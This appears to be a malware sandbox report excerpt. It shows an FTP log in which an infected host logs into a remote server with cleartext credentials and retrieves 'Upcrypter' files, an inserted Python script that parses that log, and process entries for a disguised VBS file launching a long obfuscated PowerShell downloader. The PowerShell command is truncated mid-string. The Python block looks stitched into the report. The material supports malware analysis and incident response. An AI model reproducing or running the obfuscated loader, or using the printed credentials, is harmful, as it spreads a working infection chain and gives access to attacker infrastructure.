                                Oct 3, 2024 09:28:20.710704088 CEST | 21 | 49715 | 191.252.83.213 | 192.168.2.6 | 150 File status okay. About to open data connection.
                                Oct 3, 2024 09:28:21.101475000 CEST | 21 | 49715 | 191.252.83.213 | 192.168.2.6 | 226 Transfer complete.
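The control-channel exchange above is enough to pull out what a responder needs even without the data-channel capture: the credentials sent in clear, every file retrieved, and the endpoint of each passive data connection, which the 227 reply announces as six comma-separated numbers (the first four are the host, the port is p1*256 + p2). The Python below is an added example rather than report code; it groups the rows by client port, replays the command/reply state machine, pairs each RETR with the 227 that preceded it and emits BPF filters for carving the data connections out of the full pcap. The rows are copied from the table above as constructed tuples: the 49711 session in full, the 49715 session trimmed to the lines the reconstruction uses.

```python
"""
Reconstruct what an FTP control-channel log gives away. Added example, not
Joe Sandbox code; the rows below are copied from the exchange recorded above.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# (timestamp, source port, destination port, source IP, destination IP, text)
# Constructed from the report rows: 49711 complete, 49715 trimmed.
FTP_ROWS = [
    ("09:28:09.531840086", 21, 49711, "191.252.83.213", "192.168.2.6", '220 "Servico de FTP da Locaweb"'),
    ("09:28:09.532802105", 49711, 21, "192.168.2.6", "191.252.83.213", "USER desckvbrat1"),
    ("09:28:09.761440039", 21, 49711, "191.252.83.213", "192.168.2.6", "331 Username ok, send password."),
    ("09:28:09.761626005", 49711, 21, "192.168.2.6", "191.252.83.213", "PASS developerpro21578Jp@@"),
    ("09:28:09.999851942", 21, 49711, "191.252.83.213", "192.168.2.6", "230 Login successful."),
    ("09:28:10.227607965", 21, 49711, "191.252.83.213", "192.168.2.6", "501 Invalid argument."),
    ("09:28:10.227845907", 49711, 21, "192.168.2.6", "191.252.83.213", "PWD"),
    ("09:28:10.455776930", 21, 49711, "191.252.83.213", "192.168.2.6", '257 "/" is the current directory.'),
    ("09:28:10.455993891", 49711, 21, "192.168.2.6", "191.252.83.213", "TYPE I"),
    ("09:28:10.683629036", 21, 49711, "191.252.83.213", "192.168.2.6", "200 Type set to: Binary."),
    ("09:28:10.683801889", 49711, 21, "192.168.2.6", "191.252.83.213", "PASV"),
    ("09:28:10.912352085", 21, 49711, "191.252.83.213", "192.168.2.6", "227 Entering passive mode (191,252,83,213,236,159)."),
    ("09:28:10.919930935", 49711, 21, "192.168.2.6", "191.252.83.213", "RETR Upcrypter/01/DLL01.txt"),
    ("09:28:11.149014950", 21, 49711, "191.252.83.213", "192.168.2.6", "150 File status okay. About to open data connection."),
    ("09:28:11.545571089", 21, 49711, "191.252.83.213", "192.168.2.6", "226 Transfer complete."),
    ("09:28:15.423199892", 49715, 21, "192.168.2.6", "191.252.83.213", "USER desckvbrat1"),
    ("09:28:15.646159887", 49715, 21, "192.168.2.6", "191.252.83.213", "PASS developerpro21578Jp@@"),
    ("09:28:15.877351046", 21, 49715, "191.252.83.213", "192.168.2.6", "230 Login successful."),
    ("09:28:16.966068983", 21, 49715, "191.252.83.213", "192.168.2.6", "227 Entering passive mode (191,252,83,213,235,101)."),
    ("09:28:16.974225998", 49715, 21, "192.168.2.6", "191.252.83.213", "RETR Upcrypter/01/Rumpe.txt"),
    ("09:28:17.583909035", 21, 49715, "191.252.83.213", "192.168.2.6", "226 Transfer complete."),
    ("09:28:20.480519056", 21, 49715, "191.252.83.213", "192.168.2.6", "227 Entering passive mode (191,252,83,213,236,93)."),
    ("09:28:20.487405062", 49715, 21, "192.168.2.6", "191.252.83.213", "RETR Upcrypter/01/Entry.txt"),
    ("09:28:21.101475000", 21, 49715, "191.252.83.213", "192.168.2.6", "226 Transfer complete."),
]

PASV_RE = re.compile(r"^227 .*?\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)")


@dataclass
class FtpSession:
    client_port: int
    server: str
    user: Optional[str] = None
    password: Optional[str] = None
    logged_in: bool = False
    pending_pasv: Optional[Tuple[str, int]] = None
    # (path, data host, data port, completed)
    transfers: List[Tuple[str, str, int, bool]] = field(default_factory=list)


def parse_pasv(reply: str) -> Optional[Tuple[str, int]]:
    """227 reply -> (host, port); port is p1*256 + p2 per RFC 959."""
    m = PASV_RE.match(reply)
    if not m:
        return None
    h1, h2, h3, h4, p1, p2 = (int(x) for x in m.groups())
    return f"{h1}.{h2}.{h3}.{h4}", p1 * 256 + p2


def reconstruct(rows) -> Dict[int, FtpSession]:
    """Group rows by client port and replay the command/reply state machine."""
    sessions: Dict[int, FtpSession] = {}
    for _ts, sport, dport, sip, dip, text in rows:
        from_client = dport == 21
        key = sport if from_client else dport
        sess = sessions.setdefault(key, FtpSession(key, dip if from_client else sip))
        verb, _, arg = text.partition(" ")
        if from_client:
            if verb == "USER":
                sess.user = arg
            elif verb == "PASS":
                sess.password = arg
            elif verb == "RETR":
                # Port 0 marks a RETR with no 227 seen (active mode or lost reply).
                host, port = sess.pending_pasv or (sess.server, 0)
                sess.transfers.append((arg, host, port, False))
                sess.pending_pasv = None
        elif verb == "230":
            sess.logged_in = True
        elif verb == "227":
            sess.pending_pasv = parse_pasv(text)
        elif verb == "226" and sess.transfers:
            path, host, port, _ = sess.transfers[-1]
            sess.transfers[-1] = (path, host, port, True)
    return sessions


def data_channel_filters(sessions: Dict[int, FtpSession]) -> List[str]:
    """BPF filters that isolate each passive data connection in the pcap."""
    return [f"host {h} and port {p}"
            for s in sessions.values() for _, h, p, _ in s.transfers if p]


if __name__ == "__main__":
    for s in reconstruct(FTP_ROWS).values():
        print(s.client_port, s.user, s.password, s.transfers)
    print(data_channel_filters(reconstruct(FTP_ROWS)))
```

The same credentials are reused on both control connections, and the 501 right after login is the server rejecting a command the report does not show, so the parser ignores replies it cannot pair with a request.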


                                Target ID:0
                                Start time:03:28:02
                                Start date:03/10/2024
                                Path:C:\Windows\System32\wscript.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs"
                                Imagebase:0x7ff6df030000
                                File size:170'496 bytes
                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:2
                                Start time:03:28:03
                                Start date:03/10/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'EQ' + [char]65 + 'R' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'EQ' + [char]65 + 'Jw' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + 'BY' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'VQB1' + [char]65 + 'Gg' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Gg' + [char]65 + 'd' + [char]65 + 'B0' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'cw' + [char]65 + '6' + [char]65 + 'C8' + [char]65 + 'LwB3' + [char]65 + 'Hc' + [char]65 + 'dw' + [char]65 + 'u' + [char]65 + 'Gc' + [char]65 + 'cgBh' + [char]65 + 'HQ' + [char]65 + 'aQB0' + [char]65 + 'HU' + [char]65 + 'Z' + [char]65 + 'Bl' + [char]65 + 'HM' + [char]65 + 'ZQBl' + [char]65 + 'Gs' + [char]65 + 'ZQBy' + [char]65 + 'HM' + [char]65 + 'LgBj' + [char]65 + 'G8' + [char]65 + 'bQ' + [char]65 + 'v' + [char]65 + 'Hc' + [char]65 + 'c' + [char]65 + '' + [char]65 + 't' + [char]65 + 'Gk' + [char]65 + 'bgBj' + [char]65 + 'Gw' + [char]65 + 'dQBk' + [char]65 + 'GU' + [char]65 + 'cw' + [char]65 + 'v' + [char]65 + 'GM' + [char]65 + 'dQBz' + [char]65 + 'HQ' + [char]65 + 'bwBt' + [char]65 + 'Gk' + [char]65 + 'egBl' + [char]65 + 'C8' + [char]65 + 'YwBz' + [char]65 + 'HM' + [char]65 + 'LwBi' + [char]65 + 'GQ' + [char]65 + 'LgB0' + [char]65 + 'Hg' + [char]65 + 'd' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'F0' + [char]65 + 'XQBb' + [char]65 + 'HQ' + [char]65 + 'YwBl' + [char]65 + 'Go' + [char]65 + 'YgBv' + [char]65 + 'Fs' + [char]65 + 'I' + [char]65 + '' + [char]65 + 's' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'b' + [char]65 + 'Bs' + [char]65 + 'HU' + [char]65 + 'bg' + [char]65 + 
'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bl' + [char]65 + 'Gs' + [char]65 + 'bwB2' + [char]65 + 'G4' + [char]65 + 'SQ' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Ek' + [char]65 + 'VgBG' + [char]65 + 'HI' + [char]65 + 'c' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bk' + [char]65 + 'G8' + [char]65 + 'a' + [char]65 + 'B0' + [char]65 + 'GU' + [char]65 + 'TQB0' + [char]65 + 'GU' + [char]65 + 'Rw' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'Jw' + [char]65 + 'x' + [char]65 + 'HM' + [char]65 + 'cwBh' + [char]65 + 'Gw' + [char]65 + 'Qw' + [char]65 + 'u' + [char]65 + 'DM' + [char]65 + 'eQBy' + [char]65 + 'GE' + [char]65 + 'cgBi' + [char]65 + 'Gk' + [char]65 + 'T' + [char]65 + 'Bz' + [char]65 + 'HM' + [char]65 + 'YQBs' + [char]65 + 'EM' + [char]65 + 'Jw' + [char]65 + 'o' + [char]65 + 'GU' + [char]65 + 'c' + [char]65 + 'B5' + [char]65 + 'FQ' + [char]65 + 'd' + [char]65 + 'Bl' + [char]65 + 'Ec' + [char]65 + 'Lg' + [char]65 + 'p' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'WgBj' + [char]65 + 'EI' + [char]65 + 'YwBh' + [char]65 + 'CQ' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'o' + [char]65 + 'GQ' + [char]65 + 'YQBv' + [char]65 + 'Ew' + [char]65 + 'LgBu' + [char]65 + 'Gk' + [char]65 + 'YQBt' + [char]65 + 'G8' + [char]65 + 'R' + [char]65 + 'B0' + [char]65 + 'G4' + [char]65 + 'ZQBy' + [char]65 + 'HI' + [char]65 + 'dQBD' + [char]65 + 'Do' + [char]65 + 'OgBd' + [char]65 + 'G4' + [char]65 + 'aQBh' + [char]65 + 'G0' + [char]65 + 'bwBE' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'c' + [char]65 + 'BB' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'Ww' + [char]65 + '7' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'p' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'JwBB' + [char]65 + 'Cc' + [char]65 + 'I' + [char]65 + '' + [char]65 + 's' + [char]65 + 'C' + 
[char]65 + '' + [char]65 + 'JwCTITo' + [char]65 + 'kyEn' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bl' + [char]65 + 'GM' + [char]65 + 'YQBs' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'ZQBS' + [char]65 + 'C4' + [char]65 + 'ZwBT' + [char]65 + 'Ho' + [char]65 + 'QwBC' + [char]65 + 'Gw' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'Cg' + [char]65 + 'ZwBu' + [char]65 + 'Gk' + [char]65 + 'cgB0' + [char]65 + 'FM' + [char]65 + 'N' + [char]65 + '' + [char]65 + '2' + [char]65 + 'GU' + [char]65 + 'cwBh' + [char]65 + 'EI' + [char]65 + 'bQBv' + [char]65 + 'HI' + [char]65 + 'Rg' + [char]65 + '6' + [char]65 + 'Do' + [char]65 + 'XQB0' + [char]65 + 'HI' + [char]65 + 'ZQB2' + [char]65 + 'G4' + [char]65 + 'bwBD' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'Ww' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'Ba' + [char]65 + 'GM' + [char]65 + 'QgBj' + [char]65 + 'GE' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'F0' + [char]65 + 'XQBb' + [char]65 + 'GU' + [char]65 + 'd' + [char]65 + 'B5' + [char]65 + 'EI' + [char]65 + 'Ww' + [char]65 + '7' + [char]65 + 'Cc' + [char]65 + 'JQBJ' + [char]65 + 'Gg' + [char]65 + 'cQBS' + [char]65 + 'Fg' + [char]65 + 'JQ' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Fg' + [char]65 + 'U' + [char]65 + 'BV' + [char]65 + 'HU' + [char]65 + 'a' + [char]65 + '' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Gc' + [char]65 + 'UwB6' + [char]65 + 'EM' + [char]65 + 'QgBs' + [char]65 + 'CQ' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'o' + [char]65 + 'Gc' + [char]65 + 'bgBp' + [char]65 + 'HI' + [char]65 + 'd' + [char]65 + 'BT' + [char]65 + 'GQ' + [char]65 + 'YQBv' + [char]65 + 'Gw' + [char]65 + 'bgB3' + [char]65 + 'G8' + [char]65 + 'R' + [char]65 + '' + [char]65 + 'u' + [char]65 + 'GY' + [char]65 + 'cQBk' + [char]65 + 'Go' + [char]65 + 
'bQ' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Gc' + [char]65 + 'UwB6' + [char]65 + 'EM' + [char]65 + 'QgBs' + [char]65 + 'CQ' + [char]65 + 'Ow' + [char]65 + '4' + [char]65 + 'EY' + [char]65 + 'V' + [char]65 + 'BV' + [char]65 + 'Do' + [char]65 + 'OgBd' + [char]65 + 'Gc' + [char]65 + 'bgBp' + [char]65 + 'GQ' + [char]65 + 'bwBj' + [char]65 + 'G4' + [char]65 + 'RQ' + [char]65 + 'u' + [char]65 + 'HQ' + [char]65 + 'e' + [char]65 + 'Bl' + [char]65 + 'FQ' + [char]65 + 'LgBt' + [char]65 + 'GU' + [char]65 + 'd' + [char]65 + 'Bz' + [char]65 + 'Hk' + [char]65 + 'UwBb' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Gc' + [char]65 + 'bgBp' + [char]65 + 'GQ' + [char]65 + 'bwBj' + [char]65 + 'G4' + [char]65 + 'RQ' + [char]65 + 'u' + [char]65 + 'GY' + [char]65 + 'cQBk' + [char]65 + 'Go' + [char]65 + 'bQ' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'KQB0' + [char]65 + 'G4' + [char]65 + 'ZQBp' + [char]65 + 'Gw' + [char]65 + 'QwBi' + [char]65 + 'GU' + [char]65 + 'Vw' + [char]65 + 'u' + [char]65 + 'HQ' + [char]65 + 'ZQBO' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'd' + [char]65 + 'Bj' + [char]65 + 'GU' + [char]65 + 'agBi' + [char]65 + 'E8' + [char]65 + 'LQB3' + [char]65 + 'GU' + [char]65 + 'Tg' + [char]65 + 'o' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'GY' + [char]65 + 'cQBk' + [char]65 + 'Go' + [char]65 + 'bQ' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'o' + [char]65 + 'GU' + [char]65 + 'cwBv' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'cwBp' + [char]65 + 'GQ' + [char]65 + 'LgBm' + [char]65 + 'HE' + [char]65 + 'Z' + [char]65 + 'Bq' + [char]65 + 'G0' + [char]65 + 'J' + [char]65 + '' + [char]65 + '7' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'HQ' + [char]65 + 'e' + [char]65 + 'B0' + [char]65 + 'C4' + [char]65 + 'MQ' + [char]65 + 'w' + [char]65 + 'Ew' + [char]65 + 'T' + [char]65 + 'BE' 
+ [char]65 + 'C8' + [char]65 + 'MQ' + [char]65 + 'w' + [char]65 + 'C8' + [char]65 + 'cgBl' + [char]65 + 'HQ' + [char]65 + 'c' + [char]65 + 'B5' + [char]65 + 'HI' + [char]65 + 'YwBw' + [char]65 + 'FU' + [char]65 + 'LwBy' + [char]65 + 'GI' + [char]65 + 'LgBt' + [char]65 + 'G8' + [char]65 + 'Yw' + [char]65 + 'u' + [char]65 + 'HQ' + [char]65 + 'YQBy' + [char]65 + 'GI' + [char]65 + 'dgBr' + [char]65 + 'GM' + [char]65 + 'cwBl' + [char]65 + 'GQ' + [char]65 + 'LgBw' + [char]65 + 'HQ' + [char]65 + 'ZgB' + [char]65 + '' + [char]65 + 'DE' + [char]65 + 'd' + [char]65 + 'Bh' + [char]65 + 'HI' + [char]65 + 'YgB2' + [char]65 + 'Gs' + [char]65 + 'YwBz' + [char]65 + 'GU' + [char]65 + 'Z' + [char]65 + '' + [char]65 + 'v' + [char]65 + 'C8' + [char]65 + 'OgBw' + [char]65 + 'HQ' + [char]65 + 'Zg' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bn' + [char]65 + 'G4' + [char]65 + 'aQBy' + [char]65 + 'HQ' + [char]65 + 'UwBk' + [char]65 + 'GE' + [char]65 + 'bwBs' + [char]65 + 'G4' + [char]65 + 'dwBv' + [char]65 + 'EQ' + [char]65 + 'LgBm' + [char]65 + 'HE' + [char]65 + 'Z' + [char]65 + 'Bq' + [char]65 + 'G0' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'Bn' + [char]65 + 'FM' + [char]65 + 'egBD' + [char]65 + 'EI' + [char]65 + 'b' + [char]65 + '' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'n' + [char]65 + 'E' + [char]65 + '' + [char]65 + 'Q' + [char]65 + 'Bw' + [char]65 + 'Eo' + [char]65 + 'O' + [char]65 + '' + [char]65 + '3' + [char]65 + 'DU' + [char]65 + 'MQ' + [char]65 + 'y' + [char]65 + 'G8' + [char]65 + 'cgBw' + [char]65 + 'HI' + [char]65 + 'ZQBw' + [char]65 + 'G8' + [char]65 + 'b' + [char]65 + 'Bl' + [char]65 + 'HY' + [char]65 + 'ZQBk' + [char]65 + 'Cc' + [char]65 + 'L' + [char]65 + '' + [char]65 + 'p' + [char]65 + 'Ck' + [char]65 + 'OQ' + [char]65 + '0' + [char]65 + 'Cw' + [char]65 + 'Ng' + [char]65 + 'x' + [char]65 + 'DE' + [char]65 + 'L' + [char]65 + '' + [char]65 + '3' + 
[char]65 + 'Dk' + [char]65 + 'L' + [char]65 + '' + [char]65 + '0' + [char]65 + 'DE' + [char]65 + 'MQ' + [char]65 + 's' + [char]65 + 'Dg' + [char]65 + 'OQ' + [char]65 + 's' + [char]65 + 'Dg' + [char]65 + 'MQ' + [char]65 + 'x' + [char]65 + 'Cw' + [char]65 + 'Nw' + [char]65 + 'w' + [char]65 + 'DE' + [char]65 + 'L' + [char]65 + '' + [char]65 + '5' + [char]65 + 'Dk' + [char]65 + 'L' + [char]65 + '' + [char]65 + '1' + [char]65 + 'DE' + [char]65 + 'MQ' + [char]65 + 's' + [char]65 + 'DE' + [char]65 + 'M' + [char]65 + '' + [char]65 + 'x' + [char]65 + 'Cw' + [char]65 + 'M' + [char]65 + '' + [char]65 + 'w' + [char]65 + 'DE' + [char]65 + 'K' + [char]65 + 'Bd' + [char]65 + 'F0' + [char]65 + 'WwBy' + [char]65 + 'GE' + [char]65 + 'a' + [char]65 + 'Bj' + [char]65 + 'Fs' + [char]65 + 'I' + [char]65 + 'Bu' + [char]65 + 'Gk' + [char]65 + 'bwBq' + [char]65 + 'C0' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'o' + [char]65 + 'Gw' + [char]65 + 'YQBp' + [char]65 + 'HQ' + [char]65 + 'bgBl' + [char]65 + 'GQ' + [char]65 + 'ZQBy' + [char]65 + 'EM' + [char]65 + 'awBy' + [char]65 + 'G8' + [char]65 + 'dwB0' + [char]65 + 'GU' + [char]65 + 'Tg' + [char]65 + 'u' + [char]65 + 'HQ' + [char]65 + 'ZQBO' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'I' + [char]65 + 'B0' + [char]65 + 'GM' + [char]65 + 'ZQBq' + [char]65 + 'GI' + [char]65 + 'bw' + [char]65 + 't' + [char]65 + 'Hc' + [char]65 + 'ZQBu' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'HM' + [char]65 + 'b' + [char]65 + 'Bh' + [char]65 + 'Gk' + [char]65 + 'd' + [char]65 + 'Bu' + [char]65 + 'GU' + [char]65 + 'Z' + [char]65 + 'Bl' + [char]65 + 'HI' + [char]65 + 'Qw' + [char]65 + 'u' + [char]65 + 'GY' + [char]65 + 'cQBk' + [char]65 + 'Go' + [char]65 + 'bQ' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'O' + [char]65 + 'BG' + [char]65 + 'FQ' + [char]65 + 'VQ' + [char]65 + '6' + [char]65 + 'Do' + [char]65 + 'XQBn' + [char]65 + 'G4' + [char]65 + 'aQBk' + 
[char]65 + 'G8' + [char]65 + 'YwBu' + [char]65 + 'EU' + [char]65 + 'LgB0' + [char]65 + 'Hg' + [char]65 + 'ZQBU' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'Ww' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'Bn' + [char]65 + 'G4' + [char]65 + 'aQBk' + [char]65 + 'G8' + [char]65 + 'YwBu' + [char]65 + 'EU' + [char]65 + 'LgBm' + [char]65 + 'HE' + [char]65 + 'Z' + [char]65 + 'Bq' + [char]65 + 'G0' + [char]65 + 'J' + [char]65 + '' + [char]65 + '7' + [char]65 + 'Ck' + [char]65 + 'd' + [char]65 + 'Bu' + [char]65 + 'GU' + [char]65 + 'aQBs' + [char]65 + 'EM' + [char]65 + 'YgBl' + [char]65 + 'Fc' + [char]65 + 'LgB0' + [char]65 + 'GU' + [char]65 + 'Tg' + [char]65 + 'g' + [char]65 + 'HQ' + [char]65 + 'YwBl' + [char]65 + 'Go' + [char]65 + 'YgBP' + [char]65 + 'C0' + [char]65 + 'dwBl' + [char]65 + 'E4' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'Bm' + [char]65 + 'HE' + [char]65 + 'Z' + [char]65 + 'Bq' + [char]65 + 'G0' + [char]65 + 'J' + [char]65 + '' + [char]65 + '7' + [char]65 + 'Gc' + [char]65 + 'UwB6' + [char]65 + 'EM' + [char]65 + 'QgBs' + [char]65 + 'CQ' + [char]65 + 'Ow' + [char]65 + 'y' + [char]65 + 'DE' + [char]65 + 'cwBs' + [char]65 + 'FQ' + [char]65 + 'Og' + [char]65 + '6' + [char]65 + 'F0' + [char]65 + 'ZQBw' + [char]65 + 'Hk' + [char]65 + 'V' + [char]65 + 'Bs' + [char]65 + 'G8' + [char]65 + 'YwBv' + [char]65 + 'HQ' + [char]65 + 'bwBy' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'eQB0' + [char]65 + 'Gk' + [char]65 + 'cgB1' + [char]65 + 'GM' + [char]65 + 'ZQBT' + [char]65 + 'C4' + [char]65 + 'd' + [char]65 + 'Bl' + [char]65 + 'E4' + [char]65 + 'LgBt' + [char]65 + 'GU' + [char]65 + 'd' + [char]65 + 'Bz' + [char]65 + 'Hk' + [char]65 + 'UwBb' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Gw' + [char]65 + 'bwBj' + [char]65 + 'G8' + [char]65 + 'd' + [char]65 + 'Bv' + [char]65 + 'HI' + [char]65 + 'U' + 
[char]65 + 'B5' + [char]65 + 'HQ' + [char]65 + 'aQBy' + [char]65 + 'HU' + [char]65 + 'YwBl' + [char]65 + 'FM' + [char]65 + 'Og' + [char]65 + '6' + [char]65 + 'F0' + [char]65 + 'cgBl' + [char]65 + 'Gc' + [char]65 + 'YQBu' + [char]65 + 'GE' + [char]65 + 'TQB0' + [char]65 + 'G4' + [char]65 + 'aQBv' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'ZQBj' + [char]65 + 'Gk' + [char]65 + 'dgBy' + [char]65 + 'GU' + [char]65 + 'Uw' + [char]65 + 'u' + [char]65 + 'HQ' + [char]65 + 'ZQBO' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'Ww' + [char]65 + '7' + [char]65 + 'H0' + [char]65 + 'ZQB1' + [char]65 + 'HI' + [char]65 + 'd' + [char]65 + '' + [char]65 + 'k' + [char]65 + 'Hs' + [char]65 + 'I' + [char]65 + '' + [char]65 + '9' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'awBj' + [char]65 + 'GE' + [char]65 + 'YgBs' + [char]65 + 'Gw' + [char]65 + 'YQBD' + [char]65 + 'G4' + [char]65 + 'bwBp' + [char]65 + 'HQ' + [char]65 + 'YQBk' + [char]65 + 'Gk' + [char]65 + 'b' + [char]65 + 'Bh' + [char]65 + 'FY' + [char]65 + 'ZQB0' + [char]65 + 'GE' + [char]65 + 'YwBp' + [char]65 + 'GY' + [char]65 + 'aQB0' + [char]65 + 'HI' + [char]65 + 'ZQBD' + [char]65 + 'HI' + [char]65 + 'ZQB2' + [char]65 + 'HI' + [char]65 + 'ZQBT' + [char]65 + 'Do' + [char]65 + 'OgBd' + [char]65 + 'HI' + [char]65 + 'ZQBn' + [char]65 + 'GE' + [char]65 + 'bgBh' + [char]65 + 'E0' + [char]65 + 'd' + [char]65 + 'Bu' + [char]65 + 'Gk' + [char]65 + 'bwBQ' + [char]65 + 'GU' + [char]65 + 'YwBp' + [char]65 + 'HY' + [char]65 + 'cgBl' + [char]65 + 'FM' + [char]65 + 'LgB0' + [char]65 + 'GU' + [char]65 + 'Tg' + [char]65 + 'u' + [char]65 + 'G0' + [char]65 + 'ZQB0' + [char]65 + 'HM' + [char]65 + 'eQBT' + [char]65 + 'Fs' + [char]65 + 'ew' + [char]65 + 'g' + [char]65 + 'GU' + [char]65 + 'cwBs' + [char]65 + 'GU' + [char]65 + 'fQ' + [char]65 + 'g' + [char]65 + 'GY' + [char]65 + 'Lw' + [char]65 + 'g' + [char]65 + 'D' + [char]65 + '' + [char]65 + 'I' + [char]65 + 'B0' + [char]65 + 'C8' 
+ [char]65 + 'I' + [char]65 + 'By' + [char]65 + 'C8' + [char]65 + 'I' + [char]65 + 'Bl' + [char]65 + 'Hg' + [char]65 + 'ZQ' + [char]65 + 'u' + [char]65 + 'G4' + [char]65 + 'dwBv' + [char]65 + 'GQ' + [char]65 + 'd' + [char]65 + 'B1' + [char]65 + 'Gg' + [char]65 + 'cw' + [char]65 + 'g' + [char]65 + 'Ds' + [char]65 + 'Jw' + [char]65 + 'w' + [char]65 + 'Dg' + [char]65 + 'MQ' + [char]65 + 'g' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'ZQBl' + [char]65 + 'Gw' + [char]65 + 'cw' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Z' + [char]65 + 'Bu' + [char]65 + 'GE' + [char]65 + 'bQBt' + [char]65 + 'G8' + [char]65 + 'Yw' + [char]65 + 't' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'ZQB4' + [char]65 + 'GU' + [char]65 + 'LgBs' + [char]65 + 'Gw' + [char]65 + 'ZQBo' + [char]65 + 'HM' + [char]65 + 'cgBl' + [char]65 + 'Hc' + [char]65 + 'bwBw' + [char]65 + 'Ds' + [char]65 + 'I' + [char]65 + 'Bl' + [char]65 + 'GM' + [char]65 + 'cgBv' + [char]65 + 'GY' + [char]65 + 'LQ' + [char]65 + 'g' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'dQB0' + [char]65 + 'HI' + [char]65 + 'YQB0' + [char]65 + 'FM' + [char]65 + 'X' + [char]65 + 'Bz' + [char]65 + 'G0' + [char]65 + 'YQBy' + [char]65 + 'Gc' + [char]65 + 'bwBy' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'X' + [char]65 + 'B1' + [char]65 + 'G4' + [char]65 + 'ZQBN' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'd' + [char]65 + 'By' + [char]65 + 